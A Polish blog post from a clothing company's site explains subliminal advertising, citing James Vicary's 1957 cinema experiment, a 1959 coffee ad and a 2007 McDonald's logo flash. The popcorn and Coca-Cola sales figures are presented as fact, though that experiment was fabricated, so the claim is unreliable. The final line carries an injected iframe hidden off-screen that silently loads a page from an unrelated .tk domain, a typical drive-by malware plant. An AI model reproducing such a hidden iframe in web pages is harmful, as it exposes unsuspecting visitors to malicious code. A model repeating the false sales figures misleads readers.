Reklama (nie tylko odzieżowa)

Reklama podprogowa – jak dajemy sobą manipulować?

17 listopada 2015 • Opublikowane przez

Reklama podprogowa oddziałuje na nas za sprawą informacji, które docierają do mózgu, choć nie jesteśmy tego świadomi. To technika manipulacji, którą wykorzystuje wielu producentów. Skąd właściwie wziął się ten sposób wpływania na nasz umysł i jak do tego dochodzi?

!–more–

nbsp;

Wyjaśnienia zacząć należy od sięgnięcia do terminologii psychologicznej. Percepcja podprogowa, zwana również subliminalną, to proces, polegający na rejestrowaniu informacji, bez świadomości ich dostrzegania. Tyczy się bodźców wzrokowych (lub słuchowych, choć te w reklamie wykorzystywane są rzadziej), które są za krótkie lub zbyt słabe, aby mogły zostać świadomie zauważone przez odbiorcę. Aby przekaz dotarł do naszego mózgu niezauważony, wystarczy, że będzie trwał od 4 do 10 milisekund. To niewiele, ale działanie owego przekazu może być ogromne. Jak sprawdza się on w reklamie?

nbsp;

strongZaczęło się od popcornu/strong

W 1957 roku w New Jersey przeprowadzono eksperyment. Jego pomysłodawcą  i wykonawcą zarazem był właściciel agencji reklamowo-marketingowej, James Vicary. Podczas projekcji filmu w kinie nieświadomi widzowie oglądali film z taśmy, spreparowanej tak, aby pomiędzy zaplanowane obrazy w jednominutowych odstępach wmontowano dwa rodzaje pojedynczych klatek. Na pierwszych z nich widniał napis: „Jesteś głodny? Jedz Popcorn!”, na drugich z kolei: „Jesteś spragniony? Pij Coca-Colę!”. Po projekcjach w pobliskich sklepach spożywczych sprzedaż popcornu wzrosła o 57%, a Coca-Coli o 18%. Kolejne badania potwierdzały, że to, co odbiera nasz umysł, nie zawsze jest przez niego rejestrowane, ale wywiera wpływ na nasze działania — w tym przypadku zakupy.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/11/coca-cola-13362818.jpg”img class=”size-full wp-image-2582″ src=”http://argos.pl/blog/wp-content/uploads/2015/11/coca-cola-13362818.jpg” alt=”Źródło: blokreklamowy.blogspot.com” width=”654″ height=”496″ //a Źródło: blokreklamowy.blogspot.com

nbsp;

strongPoniżej progu postrzegania/strong

Często zdarza się, że reklama w ogóle nie dociera do odbiorcy. W kinach wolimy pojawić się później, aby nie czekać przez pół godziny seansu na rozpoczęciem filmu, a trafiając na blok reklamowy podczas oglądania telewizji, przełączamy na inny kanał. Reklamy, które pojawiają się w serialach czy programach rozrywkowych — tzw. lokowanie produktu, często denerwuje obserwatorów i przynosi skutek odwrotny do zamierzonego. Za sprawą reklamy podprogowej, możliwe staje się obejście pewnych przeszkód, które stają na drodze tradycyjnych reklam. Nawet najbardziej oporny na odbiór reklam widz nie ma możliwości ominięcia reklamy, która emitowana zostaje poniżej progu świadomego postrzegania. Taka reklama pozwala również na ominięcie barier, związanych z przetwarzaniem dostarczonych do mózgu informacji, ponieważ dociera do niego z pominięciem świadomości.

nbsp;

strongNiezliczona ilość /strong

Przekaz podprogowy użyty został wielokrotnie w ogromnej ilości reklam. Stosowanie reklam podprogowych najczęściej zarzuca się wytwórni filmów Walta Disney’a. Jednym z pierwszych użyć tej metody w telewizji był spot telewizyjny, który wyemitowany został w 1959 roku. Reklamowano w nim kawę „Butter-Nut”. Animacja, stworzona przez komika Stanleya Freberga, przedstawiała wychwalającego produkt mężczyznę. W tle za nim wyświetlały się subliminalnie hasła reklamowe. Bulwersującym był także przypadek z 27 stycznia 2007 roku, kiedy to podczas emisji programu „Food Network’s Iron Chef America” na milisekundy na ekranie wyświetlała się plansza z logo restauracji McDonald’s. Sprawa stała się głośna za sprawą internetu.

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/11/mcdonalds-logo.jpg”img class=”wp-image-2585 ” src=”http://argos.pl/blog/wp-content/uploads/2015/11/mcdonalds-logo.jpg” alt=”Źródło: smbp.uwaterloo.ca” width=”583″ height=”315″ //a Źródło: smbp.uwaterloo.ca

nbsp;

strongZakazane reklamy/strong

Obecnie stosowanie reklamy podprogowej jest zakazane w Stanach Zjednoczonych oraz na terenie Europy. Jak się jednak okazuje, przepis ten bywa łamany. Jako konsumenci powinniśmy jednak mieć świadomość tego, że przekaz podprogowy jest narzędziem psychomanipulacji, a my jesteśmy na niego narażeni. Jako jej odbiorcy niewiele możemy zdziałać. Warto jednak dokonywać przemyślanych zakupów i w tej kwestii nie ulegać chwilowym impulsom, które być może były zamiarem twórców reklam subliminalnych.

nbsp;

nbsp;

nbsp;

nbs!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe